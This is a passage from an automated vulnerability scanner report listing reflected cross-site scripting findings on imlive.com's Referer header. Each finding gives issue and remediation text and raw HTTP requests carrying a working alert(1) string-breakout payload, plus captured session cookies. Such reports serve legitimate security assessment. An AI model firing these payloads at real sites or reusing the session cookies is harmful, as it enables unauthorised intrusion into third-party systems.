This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:14 GMT
Connection: close
Content-Length: 40632
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.210. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:31 GMT
Connection: close
Content-Length: 33186
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.211. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 25658
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.212. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:29 GMT
Connection: close
Content-Length: 113880
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.213. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:07 GMT
Connection: close
Content-Length: 213457
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.214. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:36 GMT
Connection: close
Content-Length: 24548
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

2.215. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 72576
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.216. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
